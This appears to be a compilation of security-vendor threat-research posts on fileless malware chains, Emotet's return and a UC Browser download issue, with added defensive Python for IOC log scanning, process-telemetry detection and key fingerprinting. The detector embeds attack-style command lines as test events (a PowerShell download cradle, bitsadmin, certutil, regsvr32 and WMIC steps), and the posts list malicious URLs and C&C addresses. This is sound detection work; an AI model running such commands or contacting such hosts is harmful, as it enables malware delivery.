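    "asasasqwqq(.)xyz",
    "bitbucket(.)org/execuseme1/1312/downloads/download.hta",
    "xyxyxyxyxy(.)xyz/wwwwqwe/11223344.exe",
    "179(.)43(.)146(.)90/fakeurl(.)htm",
    "sygicstyle(.)xyz",
    "sreex(.)info/update(.)exe",
    "clickies(.)site/CC/index(.)php",
]

# SHA256 payload hashes from the post.
IOC_SHA256 = {
    "5ad69da64dacdf87c5bdea12a20ca8fd4d34e6a16c37dfbb9a2af8df79901504": "download.hta",
    "9c69a1d81133bc9d87f28856245fbd95bd0853a3cfd92dc3ed485b395e5f1ba0": "11223344.exe",
    "ea137c0079624de8d2f8b174d44f90faa58c4eda558f7d5db0efa742f36c2cdf": "update.exe",
}


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into a matchable string."""
    return ioc.replace("(.)", ".").replace("[.]", ".").replace("hxxp", "http")


def split_ioc(ioc: str):
    """Split a refanged IOC into (host, path); host-only IOCs get path None."""
    host, _, path = refang(ioc).partition("/")
    return host.lower(), ("/" + path) if path else None


def match_url(url: str):
    """Return the IOC a URL matches, or None.

    A host-only IOC matches the host or any subdomain of it. An IOC that
    carries a path also requires that path prefix, which matters for the
    bitbucket.org entry: the host is legitimate, only that path is malicious.
    """
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    for ioc in IOC_URLS:
        ioc_host, ioc_path = split_ioc(ioc)
        if host != ioc_host and not host.endswith("." + ioc_host):
            continue
        if ioc_path is None or parsed.path.startswith(ioc_path):
            return ioc
    return None


def lookup_hash(data: bytes):
    """Return the IOC file name for a payload's SHA256, or None."""
    return IOC_SHA256.get(hashlib.sha256(data).hexdigest())


def scan(lines):
    """Scan log lines of the form "time src method url status".

    Returns [(line_no, src_ip, matched_ioc), ...] for every hit.
    """
    alerts = []
    for n, line in enumerate(lines, start=1):
        parts = line.split()
        if len(parts) < 4:
            continue
        src, url = parts[1], parts[3]
        ioc = match_url(url)
        if ioc:
            alerts.append((n, src, ioc))
    return alerts


# Constructed sample: one client walks the chain described in Figures 4-11,
# a second client fetches an unrelated bitbucket.org download.
LOG_LINES = [
    "2019-11-25T10:02:11Z 10.0.0.5 GET https://www.example.com/index.html 200",
    "2019-11-25T10:02:13Z 10.0.0.5 GET http://click.clickanalytics208.com/track.js 200",
    "2019-11-25T10:02:15Z 10.0.0.5 GET http://chrom-update.online/template.js 200",
    "2019-11-25T10:02:40Z 10.0.0.5 GET https://bitbucket.org/execuseme1/1312/downloads/download.hta 200",
    "2019-11-25T10:03:01Z 10.0.0.7 GET https://bitbucket.org/someteam/repo/downloads/tool.zip 200",
    "2019-11-25T10:03:20Z 10.0.0.5 GET http://xyxyxyxyxy.xyz/wwwwqwe/11223344.exe 200",
    "2019-11-25T10:04:00Z 10.0.0.5 GET http://179.43.146.90/fakeurl.htm 200",
]

if __name__ == "__main__":
    for line_no, src, ioc in scan(LOG_LINES):
        print(f"line {line_no}: {src} -> {ioc}")
```

Run as-is it reports five hits for 10.0.0.5 and none for the unrelated bitbucket.org download; feed `scan()` real proxy export lines in the same "time src method url status" shape to use it on production logs.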

Fileless malware campaign roundup

Zscaler Research - 1 hour 14 mins ago
Criminals frequently get caught because they leave evidence at the scene of the crime—fingerprints, DNA, and the like. Cybercriminals are no different, often leaving files behind on the systems they infect. In an effort to reduce the evidence left behind after an attack, cybercriminals developed fileless malware, a variant of malicious software that exists exclusively as a memory-based artifact. In short, the infection or malware does not write any executable files to the infected system's hard drive. By leaving few traces behind, malware authors try to postpone detection by security vendors for as long as possible.

During the past few years, fileless infection has been adopted by numerous forms of malware and advanced persistent threats (APTs). These fileless infection chains can employ multiple techniques to deliver the final payload. In one example, the Kovter Trojan stored its payload in the Windows registry. The Hancitor Trojan wrote its payload into a hollowed process spawned by shellcode injected from a Word document macro running in the Microsoft Word process. Lately, we have been seeing an increase in fileless infection techniques that leverage legitimate applications available on the victim's machine. These techniques do not rely on storing executable files and leave no direct traces on disk, making detection and removal a challenge.

In this blog, we will discuss recent malware campaigns that have used fileless infection mechanisms leveraging legitimate applications.

Figure 1: Stats showing hits of fileless infection chains

Case 1: njRat Backdoor

Although njRat has been around for a long time, we recently observed this backdoor being loaded by a fileless infection chain. The victim receives a .docx file as an attachment in a phishing email. Once the .docx file is opened, the infection cycle begins.
Figure 2: The njRat payload loaded by fileless infection

The .docx file's "document.xml.rels" contains an external reference to a remote OLE object: an RTF file exploiting CVE-2017-0199, which in turn opens an embedded .doc file containing a Visual Basic for Applications (VBA) macro.

Figure 3: The .docx downloading an RTF file

The VBA macro contains an encoded PowerShell script. It downloads a VBScript from "www[.]m9c[.]net/uploads/15676549681.jpg." The VBScript then decodes and executes the embedded PowerShell script, which downloads an encrypted Portable Executable (PE) file, the njRat executable, from "www[.]m9c[.]net/uploads/15676547971.jpg."

Figure 4: The VBS PowerShell downloads an encoded PE file

The VBScript decrypts the PE file, a .NET executable that is loaded directly into memory and runs in the context of MSBuild.exe. No disk writes are observed, and the njRat backdoor silently executes under the hood, communicating with the CnC server "borapegar147[.]ddns[.]net".

Case 2: Sodinokibi Ransomware

The Sodinokibi ransomware (also known as REvil) is one of the most well-known ransomware families in the wild today. It has been on the rise since the threat group behind the GandCrab malware operation announced at the end of May that it had shut down its operations. Recently, we have noticed that Sodinokibi has adopted a fileless mechanism.

Figure 5: The Sodinokibi payload loaded by a fileless infection

The fileless infection cycle starts when the victim clicks the BAT file received as an attachment in a phishing email. The BAT file contains a PowerShell script with Base64-encoded expressions.
Figure 6: The BAT file received via MalSpam

As shown below in the decoded PowerShell script, this script downloads another PowerShell script, containing more than 3,000 lines of code and a Base64-encoded portable executable (PE) file, from a pastebin URL and loads it, invoking a function that initiates the attack in the system's memory.

Figure 7: The decoded PowerShell expressions

Figure 8: The encoded PE file in PowerShell downloaded from the pastebin

This script decodes the PE file and hands it to a loader function, which injects it directly into the system's memory. The loaded PE file, which appears to be a DLL, is actually the Sodinokibi ransomware. We see no trace of the DLL being saved to disk as the ransomware silently starts encrypting files on the system.

Case 3: Astaroth Backdoor

The Astaroth Trojan is known for stealing credentials, keystrokes, and other system information. An analysis of the backdoor and its infection cycle is covered in detail by Microsoft. The infection chain starts with a victim clicking on an LNK file delivered via a phishing email. This LNK file contains an obfuscated WMIC command, which downloads an XSL file containing obfuscated JavaScript.

Figure 9: The obfuscated WMIC command

This JavaScript code downloads Base64-encoded payloads by abusing the Bitsadmin tool and decodes them using the Certutil tool. The payloads are XOR-encrypted PE files, except for one DLL, which is loaded using the Regsvr32 tool. Finally, this DLL decrypts the Astaroth backdoor payload and maps it into the Windows userinit process.

Figure 10: Obfuscated JavaScript in an XSL file

During the entire attack chain, only system utilities are leveraged to load the final payload. The Astaroth payload executes silently without leaving traces on the filesystem.
The case studies described above are based on techniques that take advantage of legitimate applications, such as PowerShell and Windows Management Instrumentation (WMI). However, there are other techniques in which the payload is stored in the registry and delivered by taking advantage of zero-day vulnerabilities in applications or in the operating systems themselves. In one example, the famous Equifax breach used a vulnerability in Apache Struts to deliver the payload. As the PowerShell scripts were stored in the registry, there was no direct trace of the malware being stored on disk.

Conclusion

Fileless infection campaigns are difficult to detect. That's why the Zscaler ThreatLabZ team continually monitors malware delivery mechanisms from several sources to ensure that Zscaler customers are protected.
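Because the three cases leave nothing on disk, the place to catch them is process-creation telemetry: an Office parent spawning a script host (Case 1), a PowerShell -EncodedCommand that hides a download cradle (Cases 1 and 2), and WMIC, bitsadmin, certutil and regsvr32 chained as downloader, decoder and loader (Case 3). The script below is an added example (not Zscaler's code) that decodes the UTF-16LE Base64 PowerShell uses and applies one illustrative rule per step; the events, the 203.0.113.x address (a documentation range) and the pastebin.example host are constructed, and the rule set is a starting point rather than complete coverage.

```python
"""Flag the living-off-the-land steps from the three cases above in
process-creation telemetry.

Added example, not Zscaler's code. The events are constructed (203.0.113.x is
a documentation address range), and the rules are illustrative, not a complete
detection set.
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}

# (rule name, regex applied to the lower-cased command line plus any decoded
# -EncodedCommand text). Each maps to a step the cases describe.
RULES = [
    # Astaroth: WMIC pulling a remote XSL stylesheet
    ("wmic_xsl_stylesheet", re.compile(r"\bwmic\b.*/format:\S*(https?://|\.xsl)")),
    # Astaroth: bitsadmin used as a downloader
    ("bitsadmin_transfer", re.compile(r"\bbitsadmin\b.*/transfer\b")),
    # Astaroth: certutil decoding a Base64 payload
    ("certutil_decode", re.compile(r"\bcertutil\b.*-decode\b")),
    # Astaroth: regsvr32 loading a DLL from a user-writable location
    ("regsvr32_user_path", re.compile(r"\bregsvr32\b.*\\(?:temp|appdata|programdata|public)\\")),
    # njRat / Sodinokibi: PowerShell download-and-execute primitives
    ("powershell_download_exec", re.compile(
        r"downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string|invoke-webrequest")),
]

ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind PowerShell -EncodedCommand, or None.

    PowerShell expects Base64 of UTF-16LE text; anything that fails to decode
    that way is reported as None rather than raising.
    """
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    """Return [(event_index, rule_name), ...] for every rule each event trips."""
    hits = []
    for i, ev in enumerate(events):
        parent, image = ev["parent"].lower(), ev["image"].lower()
        text = ev["cmdline"].lower()
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is not None:
            hits.append((i, "powershell_encoded_command"))
            text += " " + decoded.lower()
        # njRat: the macro in a Word document spawns a script host
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            hits.append((i, "office_spawns_script_host"))
        for name, rx in RULES:
            if rx.search(text):
                hits.append((i, name))
    return hits


# Constructed events. The encoded command is built here so the sample is
# valid; its script is a generic download cradle, not the campaign's own.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://pastebin.example/raw/x')"
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
EVENTS = [
    {"parent": "explorer.exe", "image": "chrome.exe",
     "cmdline": "chrome.exe --profile-directory=Default"},
    {"parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -enc AAAA"},          # not valid UTF-16LE
    {"parent": "explorer.exe", "image": "wmic.exe",
     "cmdline": 'wmic os get /format:"http://203.0.113.10/v.xsl"'},
    {"parent": "wscript.exe", "image": "bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download /priority high http://203.0.113.10/p.b64 C:\Users\Public\p.b64"},
    {"parent": "wscript.exe", "image": "certutil.exe",
     "cmdline": r"certutil -decode C:\Users\Public\p.b64 C:\Users\Public\p.dll"},
    {"parent": "wscript.exe", "image": "regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Users\Public\p.dll"},
]

if __name__ == "__main__":
    for idx, rule in analyze(EVENTS):
        print(f"event {idx}: {rule}")
```

The decode step matters more than the regexes: without it the Word-spawned PowerShell in event 1 would only trip the parent-child rule, and the malformed `-enc AAAA` in event 2 shows why the decoder must fail closed instead of raising on odd-length or non-Base64 input. Sysmon event 1 or Windows 4688 with command-line logging supplies the same three fields the `EVENTS` records carry.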

Emotet is back in action after a short break

Zscaler Research - 1 hour 14 mins ago
It's common for cybercriminals to launch an attack, then shortly thereafter stop the campaign before they are detected. These breaks also give these bad actors a chance to change tactics to, once again, attempt to avoid detection. That's what operators using the Emotet malware did, taking a short break before bringing Emotet back in a new, more dangerous form.

Emotet operators took about a two-month break: command and control (C&C) servers went down in late May and came back online around the end of August. Then, we began observing a new version of this malware around mid-September.

Emotet started as a banking trojan in 2014. However, it has morphed into a very prominent threat. Now, it is mostly used for spamming and downloading additional malware threats onto a target system. Based on the unique sample count of malware threats seen by the Zscaler Cloud Sandbox, Emotet and its downloaders appear to be among the most prevalent threats in 2019, followed by banking trojans and loaders, such as TrickBot and Ursnif, remote-access trojans (RATs), and off-the-shelf password stealers, such as LokiBot and AZORult.

Emotet is modular by design, supporting multiple modules for different tasks, such as stealing information, spamming, and more. It is also known to download, and to be downloaded by, other malware families, such as TrickBot and Ursnif. It has also been associated with the Ryuk ransomware.

Email conversation hijacking

This year, Emotet employed a new tactic of using stolen email content in spam campaigns. The hijacking of existing email threads can be very effective, as recipients are tricked into believing that the email was sent by the other person in the thread. This trust factor can lead to the victim opening the email (and attachment) and getting infected with Emotet, effectively making the infected system part of an Emotet botnet.

Figure 1: Emotet activity from the beginning of June 2019 to mid-September 2019.
Figure 2: The new Emotet campaign after the break.

New campaign, new document templates, and new botnets?

We observed the following new templates in spammed malicious documents (maldocs) during this new campaign.

Figures 3 and 4: New macro templates (Product Notice and Protected View)

Earlier, there were two Emotet botnets, known as Epoch 1 (E1) and Epoch 2 (E2), that used unique RSA keys to communicate with their C&C. After the break, we noticed three new RSA keys in use, which suggests the possibility of a botnet splitting into multiple botnets. The earlier keys were no longer seen in use and the latest three keys are now being used, which means the operators are reorganizing their botnet infrastructure.

Already existing RSA keys:

-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAMPLgcO0RQdJg/LTgiku57nH4KcLwHCx
S0lbynOUhHhKjTnmENrMA2idUbK6hI0JRZtii9oJSlb3e5NZiCK+Qr/NB2u7ZNRc
hG87aibm0ndS9xKDRXcmWwaQkF0PFuOHpwIDAQAB
-----END PUBLIC KEY-----

-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAL9KRKWqcld40xbUZ6hRh+fPNkgJe7K+
0y1rR0UFqc2SBmnyoR/2Ctd+8MRvU8zri2eNVkVBxCUH1Cthf3AEgRqY2kGva8gJ
Wcqls3j7RztZzqFoL+wM9DNnz/OWuiyPAQIDAQAB
-----END PUBLIC KEY-----

New RSA keys:

-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhALk+KlHgOKXm9eDkWu2yN9lanjwOm6W2
PV0tgr4msNVby2pOJ6S1MZQnQwxl7y6WWzT4kveAQhLmW8JB2M2PDOxZOgVMJH2C
AtkVW1p/P9jNJWVvjK9SmrbLdIeiKNtRfQIDAQAB
-----END PUBLIC KEY-----

-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM426uN11n2LZDk/JiS93WIWG7fGCQmP
4h5yIJUxJwrjwtGVexCelD2WKrDw9sa/xKwmQKk3b2fUhwnHXjoSpR7pLaDo7pEc
iJB5y6hjbPyrSfL3Fxu74M2SAS0Arj3uAQIDAQAB
-----END PUBLIC KEY-----

-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOzoTryw1r9RxRJPFKalO4+q7JaDZWSB
KZlEc22H6ITuE06tvJspue42TF1yk8xN+1bqW++QeV6Clm1uRswA/qoao/6p4eN0
h4zIO8PEaJ0C/9EO4cx9yfRLlVpjdEkP0QIDAQAB
-----END PUBLIC KEY-----

Figure 5: Emotet RSA keys used before and after the break. RSA1 and RSA2 were used before the break.
In this new campaign, we saw Emotet using RSA3, RSA4, and RSA5. (The numbers 1 through 5 are assigned in order of first observation in the wild.) Before the break, the two RSA keys didn't share any C&C infrastructure. In this new campaign, two sub-botnets are sharing some infrastructure (as shown in the following screenshots).

Figure 6: Emotet RSA keys and C&C infrastructure before the break.

Figure 7: RSA keys and C&C infrastructure of the new Emotet campaign.

If we check the overall C&C infrastructure and RSA key relationships before and after the break, we can clearly see a reorganization of the C&C infrastructure, which is now divided among three new Epochs. One Epoch was divided into two, while the other was used to create a single botnet with some new C&Cs.

Figure 8: The Emotet RSA key and C&C infrastructure relationships before and after the break.

Emotet Downloader payload - Technical analysis

The Emotet infection cycle generally starts with spam emails containing malicious macro documents that drop a JavaScript file. This JavaScript file then downloads the Emotet payload from a compromised WordPress website. Almost all the samples we observed were served from compromised WordPress websites (mostly version 5.2.3).

We will take a look at one such malicious document for the purpose of analysis here:

MD5 – 359696113a2156617c28d4f79cc7d44b ("file 20190924 LTR6051.doc")

The macro in the document is quite simple and straightforward but contains lots of junk.

Figure 9: Macro code containing junk instructions.

After removing the junk, this is how the macro code looks.

Figure 10: Cleaned macro code.

It gets its text from TextBox1 in UserForm2, then saves that in a "JS" file before executing that file.

Figure 11: A user form containing JavaScript code.

This JavaScript file is heavily obfuscated. More obfuscation is being added to the "JS" code incrementally.
In earlier versions of this downloader, some of the strings and function names were readable; now almost every string is obfuscated.

Figure 12: Heavily obfuscated script

This script contains an array of strings in variable "a." First, the elements of the array are shuffled using an anonymous function just after the array definition. Then there is function "b," which is used to decrypt strings and is used extensively throughout the script. By instrumenting this function, we can log the decrypted strings just before they are returned. Some of the interesting strings include:

\+\+ *(?:_0x(?:[a-f0-9]){4,6}|(?:\b|\d)[a-z0-9]{1,4}(?:\b|\d))
while (true) {}
return (function() {}.constructor("return this")( )
4|0|7|5|3|1|8|2|6
2|1|0|6|3|5|4
split
debug
error
exception
trace
http://thewomentour.com/wp-includes/f8yezb9/
WScript.Shell
ResponseBody
ActiveXObject
https://www.marquedafrique.com/k9c5qh/eb1wiw8192/
Scripting.FileSystemObject
CreateObject
https://thecrystaltrees.com/nofij3ksa/o5523/
http://4excellent.com/wp-includes/ii950106/
WScript.Shell
Popup
MSXML2.XMLHTTP
GET
open
send
http://www.davidleighlaw.com/wp-content/wlfsj15707/
Position
Open
Type
SaveToFile
random
toString
substr
0|1|3|4|2
11|15|13|4|6|9|8|7|5|0|2|3|1|10|16|14|12
return (function() {}.constructor("return this")( )
7|2|8|0|5|1|4|6|3
2|0|3|4|1
0|14|11|8|3|6|13|9|5|2|1|12|4|10|7
Not Supported File Format
There was an error opening this document. The file is damaged and could not be repaired (for example, it was sent as an email attachment and wasn't correctly decoded).

The script's functionality can be clearly determined from the decrypted strings. It downloads, saves, and runs its payload from a list of URLs and shows the following message box to trick a user into believing the file is corrupt:

Figure 13: An error message to trick a user into believing the file is corrupt.

There are multiple URLs embedded in the script files.
The following URLs were extracted from this script:

http://thewomentour[.]com/wp-includes/f8yezb9/
https://www[.]marquedafrique[.]com/k9c5qh/eb1wiw8192/
https://thecrystaltrees[.]com/nofij3ksa/o5523/
http://4excellent[.]com/wp-includes/ii950106/
http://www[.]davidleighlaw[.]com/wp-content/wlfsj15707/

In this case, the Emotet loader is downloaded from "http://thecrystaltrees[.]com/nofij3ksa/o5523/" (MD5 – 402b20268d64acded1c48ce760c76c47). The Emotet loader has already been extensively analyzed and blogged about, so we won't get into the technical details of the loader here. Below are artifacts extracted from this sample.

RSA key extracted from this sample:

-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOzoTryw1r9RxRJPFKalO4+q7JaDZWSB
KZlEc22H6ITuE06tvJspue42TF1yk8xN+1bqW++QeV6Clm1uRswA/qoao/6p4eN0
h4zIO8PEaJ0C/9EO4cx9yfRLlVpjdEkP0QIDAQAB
-----END PUBLIC KEY-----

C&C server addresses from the sample:

187[.]188[.]166[.]192:80, 200[.]57[.]102[.]71:8443, 200[.]21[.]90[.]6:8080, 46[.]41[.]134[.]46:8080, 178[.]249[.]187[.]151:8080, 217[.]199[.]160[.]224:8080, 71[.]244[.]60[.]230:7080, 119[.]59[.]124[.]163:8080, 185[.]86[.]148[.]222:8080, 190[.]230[.]60[.]129:80, 178[.]79[.]163[.]131:8080, 186[.]83[.]133[.]253:8080, 179[.]62[.]18[.]56:443, 91[.]205[.]215[.]57:7080, 217[.]113[.]27[.]158:443, 181[.]36[.]42[.]205:443, 190[.]19[.]42[.]131:80, 183[.]82[.]97[.]25:80, 77[.]245[.]101[.]134:8080, 109[.]104[.]79[.]48:8080, 159[.]203[.]204[.]126:8080, 5[.]77[.]13[.]70:80, 189[.]187[.]141[.]15:50000, 46[.]28[.]111[.]142:7080, 46[.]21[.]105[.]59:8080, 189[.]166[.]68[.]89:443, 183[.]87[.]87[.]73:80, 190[.]200[.]64[.]180:7080, 79[.]143[.]182[.]254:8080, 119[.]92[.]51[.]40:8080, 187[.]155[.]233[.]46:443, 89[.]188[.]124[.]145:443, 201[.]163[.]74[.]202:443, 62[.]75[.]160[.]178:8080, 51[.]15[.]8[.]192:8080, 46[.]29[.]183[.]211:8080, 62[.]75[.]143[.]100:7080, 114[.]79[.]134[.]129:443, 190[.]230[.]60[.]129:80, 190[.]117[.]206[.]153:443, 203[.]25[.]159[.]3:8080, 217[.]199[.]175[.]216:8080, 80[.]85[.]87[.]122:8080, 190[.]1[.]37[.]125:443, 23[.]92[.]22[.]225:7080, 81[.]169[.]140[.]14:443, 46[.]163[.]144[.]228:80, 5[.]196[.]35[.]138:7080, 189[.]129[.]4[.]186:80, 151[.]80[.]142[.]33:80, 190[.]221[.]50[.]210:8080, 190[.]104[.]253[.]234:990, 71[.]244[.]60[.]231:7080, 91[.]83[.]93[.]124:7080, 181[.]81[.]143[.]108:80, 181[.]188[.]149[.]134:80, 50[.]28[.]51[.]143:8080, 123[.]168[.]4[.]66:22, 211[.]229[.]116[.]97:80, 201[.]184[.]65[.]229:80, 77[.]55[.]211[.]77:8080, 212[.]71[.]237[.]140:8080, 190[.]38[.]14[.]52:80, 46[.]41[.]151[.]103:8080, 149[.]62[.]173[.]247:8080, 87[.]106[.]77[.]40:7080, 86[.]42[.]166[.]147:80, 109[.]169[.]86[.]13:8080, 88[.]250[.]223[.]190:8080, 138[.]68[.]106[.]4:7080, 200[.]58[.]171[.]51:80

Conclusion

Emotet is an ever-evolving threat, employing new tricks and tactics. Although it started as a banking trojan, Emotet is now associated with several different malware campaigns, including ransomware and infostealers. The Zscaler ThreatLabZ team proactively tracks and ensures coverage to block downloaders, payloads, and C&C activity from Emotet and other threats.

ThreatLabZ is the research division of Zscaler. To learn more about ThreatLabZ and Zscaler cloud activity, visit https://www.zscaler.com/threatlabz/cloud-activity-dashboard
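The post tracks Emotet's epochs by the RSA public key each loader carries, so the practical first step on a new sample is to reduce its PEM to a stable fingerprint and confirm the key looks like the others (the same small modulus and exponent). The script below is an added example, not Zscaler's tooling: it parses the five PEM blocks printed above with a minimal DER walker (no external crypto library), emits a SHA256 fingerprint per key, and refangs and de-duplicates C&C entries. The PEM blocks are the post's own keys; the C&C sample is a constructed subset of the post's list that deliberately keeps its duplicated 190[.]230[.]60[.]129:80 entry. Nothing here contacts any host.

```python
"""Fingerprint the Emotet RSA public keys shown above and check their shape.

Added example, not Zscaler's tooling. The five PEM blocks are the keys printed
in the post (RSA1-RSA5 in order). The C&C entries are a handful copied from the
post's list, including its duplicated 190[.]230[.]60[.]129:80 entry, to show
the de-duplication step; nothing here contacts any host.
"""
import base64
import hashlib
import re

PEM_KEYS = """\
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAMPLgcO0RQdJg/LTgiku57nH4KcLwHCx
S0lbynOUhHhKjTnmENrMA2idUbK6hI0JRZtii9oJSlb3e5NZiCK+Qr/NB2u7ZNRc
hG87aibm0ndS9xKDRXcmWwaQkF0PFuOHpwIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAL9KRKWqcld40xbUZ6hRh+fPNkgJe7K+
0y1rR0UFqc2SBmnyoR/2Ctd+8MRvU8zri2eNVkVBxCUH1Cthf3AEgRqY2kGva8gJ
Wcqls3j7RztZzqFoL+wM9DNnz/OWuiyPAQIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhALk+KlHgOKXm9eDkWu2yN9lanjwOm6W2
PV0tgr4msNVby2pOJ6S1MZQnQwxl7y6WWzT4kveAQhLmW8JB2M2PDOxZOgVMJH2C
AtkVW1p/P9jNJWVvjK9SmrbLdIeiKNtRfQIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM426uN11n2LZDk/JiS93WIWG7fGCQmP
4h5yIJUxJwrjwtGVexCelD2WKrDw9sa/xKwmQKk3b2fUhwnHXjoSpR7pLaDo7pEc
iJB5y6hjbPyrSfL3Fxu74M2SAS0Arj3uAQIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOzoTryw1r9RxRJPFKalO4+q7JaDZWSB
KZlEc22H6ITuE06tvJspue42TF1yk8xN+1bqW++QeV6Clm1uRswA/qoao/6p4eN0
h4zIO8PEaJ0C/9EO4cx9yfRLlVpjdEkP0QIDAQAB
-----END PUBLIC KEY-----
"""


def pem_blocks(text):
    """Return the DER bytes of every PUBLIC KEY block in text."""
    pat = re.compile(r"-----BEGIN PUBLIC KEY-----(.*?)-----END PUBLIC KEY-----", re.S)
    return [base64.b64decode("".join(m.split())) for m in pat.findall(text)]


def der_read(buf, pos=0):
    """Decode one DER TLV at buf[pos]: returns (tag, content, end_offset)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                     # long form: low bits give length-of-length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def rsa_public_numbers(der):
    """Walk a SubjectPublicKeyInfo and return (modulus, exponent)."""
    tag, spki, _ = der_read(der)
    if tag != 0x30:
        raise ValueError("not a SEQUENCE")
    _, _alg, pos = der_read(spki)         # AlgorithmIdentifier, skipped
    tag, bits, _ = der_read(spki, pos)
    if tag != 0x03 or bits[0] != 0:
        raise ValueError("expected BIT STRING with no unused bits")
    tag, rsakey, _ = der_read(bits[1:])   # RSAPublicKey ::= SEQUENCE { n, e }
    if tag != 0x30:
        raise ValueError("RSAPublicKey is not a SEQUENCE")
    tag_n, n_bytes, pos = der_read(rsakey)
    tag_e, e_bytes, _ = der_read(rsakey, pos)
    if tag_n != 0x02 or tag_e != 0x02:
        raise ValueError("modulus/exponent are not INTEGERs")
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def summarize(text):
    """One record per key: SHA256 of the DER, modulus size and exponent."""
    out = []
    for i, der in enumerate(pem_blocks(text), start=1):
        n, e = rsa_public_numbers(der)
        out.append({"label": f"RSA{i}", "fingerprint": hashlib.sha256(der).hexdigest(),
                    "bits": n.bit_length(), "e": e})
    return out


CNC_RE = re.compile(r"(\d{1,3}(?:\[\.\]\d{1,3}){3}):(\d+)")


def parse_cnc(text):
    """Refang "a[.]b[.]c[.]d:port" entries and return the unique (ip, port) pairs."""
    pairs = {(ip.replace("[.]", "."), int(port)) for ip, port in CNC_RE.findall(text)}
    return sorted(pairs)


# Constructed subset of the post's C&C list (with its duplicate entry).
CNC_SAMPLE = """187[.]188[.]166[.]192:80, 200[.]57[.]102[.]71:8443, 190[.]230[.]60[.]129:80,
46[.]41[.]134[.]46:8080, 190[.]230[.]60[.]129:80, 189[.]187[.]141[.]15:50000"""

if __name__ == "__main__":
    for rec in summarize(PEM_KEYS):
        print(rec["label"], rec["bits"], rec["e"], rec["fingerprint"][:16])
    print(len(parse_cnc(CNC_SAMPLE)), "unique C&C endpoints")
```

All five keys decode to 768-bit RSA moduli with exponent 65537, which is what the identical `MHwwDQYJ...` prefixes already hint at; the fingerprint, not the PEM text, is what a tracking database should key on, so that whitespace or line-wrapping differences between reports do not split one epoch into two.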

UC Browser app abuses may have exposed 500 million users

Zscaler Research - 1 hour 14 mins ago
Recently, when examining the Zscaler cloud for unusual activity, ThreatLabZ researchers found some questionable hits in relation to a particular domain: 9appsdownloading[.]com. Upon analysis, we found these requests being made from a popular browser that's available on Google Play and has more than 500 million downloads to date: the UC Browser app.

Fig. 1: UC Browser on Google Play

As we began to analyze the UC Browser app, we found that the requests were being made to download an additional Android Package Kit (APK) over an unsecured channel (HTTP instead of HTTPS). Downloading and/or updating components from a third-party source violates Google Play policy, which states: "An app may not download executable code (e.g., dex, JAR, .so files) from a source other than Google Play." We decided to explore the UC Browser app further and found the following issues, which are discussed in detail in this blog:

- Downloading an additional APK from a third party – in violation of Google Play policy
- Communication over an unsecured channel – opening doors to man-in-the-middle attacks
- Dropping an APK on external storage (/storage/emulated/0) – allowing other apps, with appropriate permissions, to tamper with the APK

We found another app, UC Browser Mini, from the same developer with the same functionality and issues; it dropped the same additional APK from a remote server. The screenshot below shows UC Mini on Google Play.

Fig. 2: UC Browser Mini (UC Mini)

It is important to note that these issues have the potential to affect millions of Android users because the UC Browser app has been downloaded 500 million+ times and UC Mini has been downloaded 100 million+ times. The ThreatLabZ team has been in contact with Google, whose teams are investigating the apps.

Timeline:

August 13, 2019: Zscaler reported the policy violation to Google.
August 13, 2019: Google promptly responded. Case assigned to an investigation team.
August 13 – September 25, 2019: Follow-up emails with research details.
September 27, 2019: Google confirmed the policy violation by UC Browser and UC Mini. Google contacted the UC developers to update the apps and remediate the policy violation.

Update: After Google's intervention, the Zscaler research team noticed that the latest versions of both apps, UC Browser and UC Mini, have stopped downloading the third-party app store.

Technical Details of UC Browser

Name: UC Browser
Package Name: com.UCMobile.intl
Installs: 500,000,000+ (500M+)
Developer: UCWeb Singapore Pte. Ltd.

1. Downloading an APK from a third party

Having identified the UC Browser app as the main culprit, we decided to dig deeper into our analysis of the app. As soon as the app is installed, it displays basic activities (Android screens) to set up the default language, topics of interest, location, and so on.

